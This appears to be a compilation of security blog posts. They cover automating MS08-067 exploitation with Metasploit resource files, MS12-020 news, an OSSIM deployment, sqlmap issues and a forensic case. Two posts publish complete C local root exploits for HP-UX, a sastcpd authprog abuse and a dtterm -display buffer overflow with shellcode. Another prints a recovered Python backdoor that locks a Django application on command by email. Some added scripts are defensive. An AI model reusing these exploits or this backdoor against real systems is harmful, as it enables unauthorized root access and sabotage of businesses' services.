Automating low hanging fruit exploitation with metasploit resource files

cowhat

Low-hanging fruit is usually the first thing I try as a security consultant: while the full scanners are kicking off, I also start “extra” scans that are not full probes but only look for the specific vulnerabilities that, in my experience, are the quickest way to gain enterprise administrator on the internal network.

So this time we take a fairly easy example, MS08-067 (the ever-present “will it ever die?” vulnerability), and automate it just to make the shells rain; the same approach can be adapted to other vulnerabilities (which I will be updating and posting here).

A nice feature is that resource files can embed Ruby by wrapping it in <ruby> </ruby> tags.

I will dissect the entire resource file part by part, explain it and see a few “tricks” that I encountered to make it work:

use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false

This just sets up the handler and payload and disables ExitOnSession; nothing much, and pretty standard in the resource files you can find on “them googles”. The next lines are:

if (framework.datastore['LHOST'] == nil )
    print_error("No LHOST set, where do we get the shells? go fix (must be global so setg instead of set)")
    return
end
if (framework.datastore['RHOSTS'] == nil)
    print_error("RHOSTS must be set globally (pro tip: use setg instead of set)... exiting")
    return
end

So this just checks that LHOST and RHOSTS are set. They must be set with setg: the check runs once the resource file goes into the module, and anything set with plain set instead of globally will just be gone by then. Pretty simple.



Video about Trapper 1.0 from Campus Party 2010 (SSH, SMB, FTP abuse and hijack using a hydra)

I found this gorgeous thing: four minutes long, but it shows what Trapper is, some of its code and some examples that were done right there:

Conferencia “Trapper, de sniffer a hydra” from Jonathan Cabrera on Vimeo.


[Old Exploits] HPUX sastcpd local exploit

cowhat

Another oldie but goodie! There was a shell script roaming around, but I think (I can only presume, honestly; it’s been a while) that as an exercise at the time I set the exploit up in a .c file instead of having shell scripts all over the place. I personally dislike having exploits as shell scripts, as they might go a bit rogue on you if you are not in the expected shell, like ksh.

So here is yet another HP-UX exploit. Keep them coming: later I will dissect every single one, go through them and the techniques involved for all the exploits I post during this week, so come back to check them out!

Again, the “stdio.h” and so forth includes are meant to be the standard angle-bracket system headers (the blog’s code rendering strips those):

/*
  x-sastcpd.c

  XyXyXyXy
  To all the shit that has hit my life: "FUCK U I'LL SEE YOU IN HELL!"
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

extern char **environ;

int main(int argc, char **argv) {
  char *env1, *env2;
  char buffer[1024];
  char *vuln;

  vuln = (char *)malloc(256);

  /* argv[1] is the path of the sastcpd binary to run */
  if(argc > 1) {
    snprintf(vuln, 255, "%s", argv[1]);
  }
  else {
    fprintf(stderr, "Usage: %s \n", argv[0]);
    exit(1);
  }

  if((env2 = getenv("HOME")) == NULL) {
    fprintf(stderr, "WHAT!? NO HOME?????\n");
    exit(-1);
  }

  /* point sastcpd's authprog variable back at this very program ($HOME/argv[0]) */
  fprintf(stderr, "Setting up the environment variable ...");
  snprintf(buffer, 1024, "%s/%s", env2, argv[0]);
  setenv("authprog", buffer, 1);
  fprintf(stderr, "DONE\n");

  if((env1 = getenv("LOCK")) == NULL) {
    /* first pass: mark the environment and re-exec ourselves with it */
    fprintf(stderr, "sastcpd exploit by XyXyXyXy, .sh sux, all in one nice .c\n");
    setenv("LOCK", "XyXyXyXy", 0);
    execve(argv[0], argv, environ);
  }
  else {
    /* second pass, reached when sastcpd runs authprog: drop into a shell */
    seteuid(0);
    setuid(0);
    setegid(0);
    setgid(0);
    execl("/sbin/sh", "/sbin/sh", NULL);
  }

  /* after the re-exec: run the target, which will call authprog */
  execl(vuln, vuln, NULL);

  return 0;
}

Simple and quick … ohhh yeah! keep it classy and GIT R DUN!


[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

cowhat

Well, here comes an oldie but goodie. The dtterm -display option is a very old bug; my google-fu did not really show me any exploits for it (I saw some bug reports about setting the DISPLAY= variable and having it crash, which I presume is the same bug). I don’t have an HP-UX at hand; I found this in a very, very, VERY old directory while roaming around old HDs and thought I would publish it, as again I can’t find any for HP-UX.

This bug is annoyingly easy, yet so hard: at first I wanted to set it up the way I set up the Linux exploits (more on that later), with execve() and so forth, but … guess not! Anyway, this was from around 2000, while I was honestly still fiddling with new techniques, browsing around and never publishing my exploits. I have removed the old header as it was holding an old handle :P keep the mystique going! LoL!

Due to my noobness, please read the “stdio.h”, “unistd.h” and “stdlib.h” includes as the angle-bracket system headers (google prettify is not kind to those, so they wouldn’t “show” in the HTML but would be in the source; embedding fail).

/*
  x-dtterm-hpux.c

  XXXXXXXX
  "This bug is completly theoderaadtical"
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define BUFFSIZE  3000
#define ALIGN     0
#define NOP       0x08630243   /* PA-RISC instruction used as a no-op for the sled */
#define OFFSET    0
#define FIRSTJUMP 40           /* number of return address copies appended */
#define RETADDR   0x7b00484c

static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

/* PA-RISC: return the current stack pointer */
long get_sp(void) {
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
  char c0de[4096];
  char *ch_ptr;
  char *envy;
  int aux;
  unsigned long addr;
  unsigned long addr2;
  int align = ALIGN;
  int buffsize = BUFFSIZE;
  int offset = OFFSET;
  unsigned long sysaddr;

  if(argc > 1) align = atoi(argv[1]) * 4;
  if(argc > 2) offset = atoi(argv[2]);

  ch_ptr = c0de;

  addr=get_sp()+offset;
  addr2 = RETADDR + offset;
  addr2 = (unsigned long)c0de;

  /* sled: fill everything except the shellcode and the FIRSTJUMP*4 bytes of addresses */
  for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
    *(ch_ptr++)=(NOP>>24)&255;
    *(ch_ptr++)=(NOP>>16)&255;
    *(ch_ptr++)=(NOP>>8)&255;
    *(ch_ptr++)=NOP&255;
  }

  memcpy(ch_ptr, shellcode, strlen(shellcode));

  ch_ptr+=strlen(shellcode);

  /* return address copies; the loop bound was eaten by the HTML rendering and is
     restored from the 40*4 bytes reserved above (FIRSTJUMP == 40) */
  for (aux=0; aux<FIRSTJUMP; aux++) {
    *(ch_ptr++)=(addr>>24)&255;
    *(ch_ptr++)=(addr>>16)&255;
    *(ch_ptr++)=(addr>>8)&255;
    *(ch_ptr++)=addr&255;
  }

  /*
  for (aux=0; aux<800; aux++) {
    *(ch_ptr++)=(addr2>>24)&255;
    *(ch_ptr++)=(addr2>>16)&255;
    *(ch_ptr++)=(addr2>>8)&255;
    *(ch_ptr++)=addr2&255;
  }
  */
  c0de[BUFFSIZE-1]='\0';

  fprintf(stderr, "return address will be %#lx shellcode is at %#lx\n", addr, addr2);

  if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, NULL) < 0) {
    fprintf(stderr, "whoa!\n");
    exit(1);
  }

  return 0;
}

Hope you like it. I have exploit binaries compiled for HP-UX 11.11, either dynamic or static, but who in their right mind would just grab a binary from someone and run it? If I can get hold of an HP-UX 11.11 machine with a gcc/cc compiler I can video the compilation, get the md5 and then upload them.

Anyway back to the SUNDAY SUNDAY SUNDAY!!!


ms12-020 saga: PoC exploit on pastebin and online rdp vulnerability scan: rdpcheck.com

ms12-020 PoC Leak

So, rolling along and checking istherdpexploitoutyet.com again, I found an interesting thing: they link to a PoC on pastebin, which apparently messes up your box (I wonder how many people lost boxes on that one). They also link to another cool site, rdpcheck.com, which scans you back to check whether you are vulnerable to the RDP exploit; they even check that you don’t use disposable addresses, which is very interesting and cool.

So I put in my gmail address and clicked test. I don’t have any RDP at my home address, but I wanted to see how they handle closed ports; then I’ll set up an exploitable RDP, let them scan me :) and update this post!

After you click test you will receive an email like this (IP address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on its standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into a self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?
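The three verdicts in the rdpcheck email (reachable, nothing listening, no answer at all) come straight from how a TCP connect to port 3389 fails. The script below is an added example, not rdpcheck’s code, for checking your own address the same way; the localhost demo and the port-free listener it uses are constructed for illustration.

```python
import socket
import sys

RDP_PORT = 3389  # the standard Remote Desktop port the rdpcheck advice refers to

def rdp_exposure(host, port=RDP_PORT, timeout=3.0):
    """Classify a host's RDP port with the same three verdicts as the
    rdpcheck e-mail quoted above.

      "open"     -> the TCP handshake completed: RDP is reachable from here
      "closed"   -> the host answered with a reset: nothing listens there
      "filtered" -> no answer within the timeout (inconclusive): a silent
                    firewall or network trouble, so verify the rule directly
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:  # socket.timeout and unreachable-network errors
        return "filtered"

def local_demo():
    """Constructed check: probe a throwaway listener on localhost while it is
    up, then the same port once it is gone (expect "open", then "closed")."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    while_open = rdp_exposure("127.0.0.1", port, timeout=1.0)
    listener.close()
    after_close = rdp_exposure("127.0.0.1", port, timeout=1.0)
    return while_open, after_close

if __name__ == "__main__":
    # Run this from outside your own network against your public address to
    # see what the Internet sees; localhost is only a demonstration.
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(f"{target}:{RDP_PORT} -> {rdp_exposure(target)}")
```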


[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

I recently had to do a fast forensic job for a friend; he asked me for some help as he was taking over some businesses that had been “abandoned” by an “open source consultant”, which is to say someone who installs everything on Linux and, in this case, does half the coding.

The problem arose as soon as they took over the network: within the hour a critical system for the business stopped working. This was more than suspicious, as another business previously administered by this person had files erased and configurations lost when it was transitioned to another admin, because of a lack of administration and ethics on the admin’s part.

First I tried to decompile the Python files from the Django server, because obviously all the servers were blocked except for port 80. My friend innocently forgot to block all access to the internet, as he thought that was not that hardcore important (#FAIL), and he didn’t really think this person (who, as it turns out, is now consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it through strings to figure out what is in there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t decompile quickly, so after putting it into IDA and other nice decompilers this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

# Python 2 code as recovered: the mailbox the backdoor polls for commands,
# the command words it understands, and the file whose contents gate the application.
user = 'xxxxxx'
passwd = 'xxxxxxxx'
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'

def check_locker():
    try:
        m = poplib.POP3_SSL('pop.gmail.com', 995)
        m.user(user)
        m.pass_(passwd)
    except Exception, err:
        print err
    else:
        numero = len(m.list()[1])
        for i in range(numero):
            (response, headerLines, bytes) = m.retr(i + 1)
            mensaje = '\n'.join(headerLines)
            p = Parser()
            email = p.parsestr(mensaje)
            subject = email['Subject']
            if (subject == LOCK):
                # "locking": empty the file, which stops the application
                print 'bloqueando'
                f = open(file_log, 'w')
                f.write('')
                f.close()
            elif (subject == UNLOCK):
                # "unlocking": put the expected contents back
                print 'desbloqueando'
                f = open(file_log, 'w')
                f.write('xxxxxxxxxxxxx')
                f.close()
            elif (subject == GETIP):
                check_ip()
        m.quit()

def check_ip():
    # mail the server's public IP address back to the operator
    import urllib2
    from django.core.management import setup_environ
    import xml.dom.minidom
    from BeautifulSoup import BeautifulSoup
    import settings
    setup_environ(settings)
    listmail = ['xxxxxxxx@gmail.com']
    content = ''
    feed = urllib2.urlopen('http://www.google.com')
    response = BeautifulSoup(feed.read())
    html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
    subject = 'IP del servidor'
    msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
    msg.attach_alternative(html_content, 'text/html')
    msg.send()

if (__name__ == '__main__'):
    check_ip()

As you can see the backdoor is pretty small and “efficient”: it checks a gmail account, and if an email with the subject LOCKSYSTEM is sent to that account it automatically shuts down the application; you can of course unlock the system with another email.

This might have been coded because they thought the client wouldn’t pay them? Why would he code something like this without the client’s consent? No documentation was delivered with the code, and as soon as the admin/developer was let go the system was shut down within the hour. It sounds to me more like a blackmail function than an actual admin function, as it only turns off the system: no backups, nothing.

This makes me wonder why this would be created, or executed. I thought about writing a fast and ugly rule so that if anything like this happened again at least the Snort sensors would alert, and I told my friend to lock down the firewall rules, but this lack of ethics is overwhelming. I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

A Snort rule would not really work as it’s doing POP3 over SSL, but then blocking port 993 should lock him out. Still … why do people do this? Don’t they understand this lack of ethics is preposterous?
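The strings pass above was the fast way to spot the mail-fetch API, the command words and the hidden log path; the same triage can be done on the compiled code object itself without running it. This is an added example (not the recovered py_util code): it compiles a constructed sample shaped like the decompiled module, polling a POP3S mailbox on pop.gmail.com port 995 as the recovered code does, and walks the .pyc for those indicators; the sample’s names and paths are invented for the demonstration, and the 16-byte header it skips assumes a CPython 3.7+ .pyc.

```python
import marshal
import os
import py_compile
import re
import tempfile
import types

# Constructed sample mirroring the shape of the decompiled py_util.py above
# (mail-polled LOCK command, hidden "log" file); it is not the original file.
SAMPLE_SOURCE = '''
import poplib
from email.parser import Parser
passwd = "mailbox-password"
LOCK = "LOCKSYSTEM"
file_log = "/srv/app/.python.log"
def check_locker():
    m = poplib.POP3_SSL("pop.gmail.com", 995)
    m.user("mailbox-user")
    m.pass_(passwd)
    for i in range(len(m.list()[1])):
        subject = Parser().parsestr(b"\\n".join(m.retr(i + 1)[1]).decode())["Subject"]
        if subject == LOCK:
            open(file_log, "w").close()
    m.quit()
'''

# Attribute/function names a Django web application has no business calling.
MAIL_FETCH_NAMES = {"POP3", "POP3_SSL", "IMAP4", "IMAP4_SSL", "pass_", "retr"}

def walk_code(code):
    """Yield a code object and every code object nested in its constants."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)

def triage_code(code):
    """Return (category, value, enclosing code name) triples worth a closer look."""
    findings = []
    for c in walk_code(code):
        for name in c.co_names:
            if name in MAIL_FETCH_NAMES:
                findings.append(("mail-fetch api", name, c.co_name))
        for const in c.co_consts:
            if not isinstance(const, str):
                continue
            if const.startswith(("pop.", "imap.")):
                findings.append(("mail host", const, c.co_name))
            elif const.startswith("/") and "/." in const:
                findings.append(("hidden file path", const, c.co_name))
            elif re.fullmatch(r"[A-Z]{5,}", const):
                findings.append(("command word", const, c.co_name))
    return findings

def triage_pyc(path):
    """Triage a compiled module without importing or running it (assumes a
    CPython 3.7+ .pyc: 16-byte header, then the marshalled code object)."""
    with open(path, "rb") as f:
        f.seek(16)
        return triage_code(marshal.load(f))

def demo():
    """Compile the constructed sample to a .pyc in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "py_util_sample.py")
        with open(src, "w") as f:
            f.write(SAMPLE_SOURCE)
        return triage_pyc(py_compile.compile(src, cfile=src + "c", doraise=True))

if __name__ == "__main__":
    for category, value, where in demo():
        print(f"{category:16} {value!r:28} in {where}")
```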


MS12-020, The saga continues: exploit code published for the RDP chinese worm leaked from Microsoft?

I was sent this link which is hilarious: http://istherdpexploitoutyet.com/

It has some really short information on the exploit and PoC and obviously who bought it (yes kids, ZDI bought this one, gave it to Microsoft, and then one of them managed to leak it); apparently the original exploit code was leaked (complete article HERE).

From the article:

“Chinese hackers have released proof-of-concept code that provides a roadmap to exploit a dangerous RDP (remote desktop protocol) vulnerability that was patched by Microsoft earlier this week.

The publication of the code on a Chinese language forum heightens the urgency to apply Microsoft’s MS12-020 update, which addresses a remote, pre-authentication, network-accessible code execution vulnerability in Microsoft’s implementation of the RDP protocol.”

Well, I’m not fluent in Chinese at all, BUT when I went to the website it clearly says at the top:

“0day discount
This BLOG from time to time the market of 0day of exp”

Errr, I’m sorry, but that does not tell ANYONE to go and patch as the article says; they actually go further, saying: “Thanks to 360 friends to provide the EXP.” So apparently the 360 guys managed to grab the exploit, which apparently carries a special signature from the researcher Luigi Auriemma (@luigi_auriemma).

That is a good practice and I hope it starts again: watermarking the PoCs so you can see where the leak is. The interesting part is … who is owned by the Chinese? ZDI? Or Microsoft? If they leaked that, which others have been leaked?

This bug will end up showing more flaws in how it was handled and how its PoC leaked than the bug itself!

UPDATE:

In this tweet (https://twitter.com/#!/luigi_auriemma/status/180646548395401216) Luigi Auriemma confirms that Microsoft was the source of the leak.

Luigi Auriemma ‏ @luigi_auriemma
in case it isn’t clear yet: rdpclient.exe seems written by Microsoft using the original packet poc I sent to ZDI. MS is the source of the leak

His Advisory can be seen HERE


MS12-020 the new MS08-067?

From Microsoft’s support website:

MS12-020: Vulnerabilities in Remote Desktop could allow remote code execution: March 13, 2012

The interesting thing is that this link (http://support.microsoft.com/kb/2671387) says on the more information tab:

“2667402 MS12-020: Description of the security update for Terminal Server Denial of Service Vulnerability: March 13, 2012″

But then on this link (http://blogs.technet.com/b/msrc/archive/2012/03/13/strength-flexibility-and-the-march-2012-security-bulletins.aspx) they actually talk about a critical one, which means it’s exploitable. This has turned a lot of heads and made people wonder whether this bug will end up being the new MS08-067 due to its longevity (God knows finding that one will render Enterprise Admin or Domain Admin too quickly most of the time anyway).

Let’s see how fast the guys at metasploit project (www.metasploit.com) will come up with an exploit for it!

(NOTE: Thank you so much flacman for catching the typo .. sorry!!!!)


AlienVault OSSIM on Cisco 4255 IPS (part 1)

For my previous job I designed the defense infrastructure. This was an interesting challenge, especially since it is a fast and complex environment (SaaS) and, as usual, ever changing and growing; one of the restrictions was that we wanted to reuse the end-of-life Cisco 4255 IPS boxes we had in there and be able to get them out.

So first things first: get the Cisco IPS 4255 unracked and bring them to the office? NO, ssh into them and try to get the then SOC Monitoring Engineer to do it. As soon as I got into the “maintenance” shell I realized it’s an old, modified 2.4.X Linux with a very (VERY) small disk of 512 MB, loaded read-only, with a bigmem filesystem to keep the logs.

So the first step was to deploy a chrooted Linux image. This had a small challenge: debootstrap a really old image (that took a bit of tweaking since everything was so old on that box), tarball it, and then swear a bit because gcc, glibc, etc. were not in the first image and redo it; these systems have no internet connection for security purposes, so it wasn’t a fast apt-get install from old archive repositories.

Then it was time to compile Snort rules, but … we ended up with a very old Snort, compiled barnyard and ran it like that for a week as a test (it wasn’t my project anyway; I was just helping the SOC).

First problem:

- Reboot, and your chroot system was gone. Why? Easy: the chroot had to be run within the bigmem partition, which for some weird reason wouldn’t preserve our directory, so it would wipe it out and put old logs in there (I presume it was a licensing thing or signature stuff; I wasn’t that interested in making it work).

The demo worked, and as the SOC engineer pretty much stood up, grabbed his stuff and left without notice all of a sudden … VOILA! I got the SOC.

First things first, and that was to mod OSSIM (which is an entirely different post altogether) onto an office server and verify that it works and was what we were looking for.

Then, voila, the Cisco IPS boxes were unracked and sent to my office, where I could open them up, facepalm and try to make them work.

So what is on the CISCO IPS 4255?

Short answer: a VERY VERY old 2.4 kernel Linux, tricked out with some stuff. I think I made an image of the 512 MB OS, but I’m sure Cisco wouldn’t be happy if I just linked to it :)


SQLMap query problems

Well, I run a CTF game with psymera and we are constantly adding new VMware machines and new tests just to keep on playing and not get bored. As part of an internal training where I work I started to create some videos on how to use SQLMap (I promise to upload them here shortly in a big rant about it), so I started with what everyone does: update your version.

And something interesting happened: sqlmap enumeration broke (gorgeous), but it didn’t look much like it. It baffled me at first, so much that I had to do everything by hand, and I asked psymera if he had changed something; he said no.

So this is the info of the updated sqlmap version to that date:


root@fsckOSX:/pentest/database/sqlmap# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 4380
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 4380
Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)

The SVN rev is 4380, the latest as of Sep 19th; here is an example of a run against the vulnerable web server with this revision.

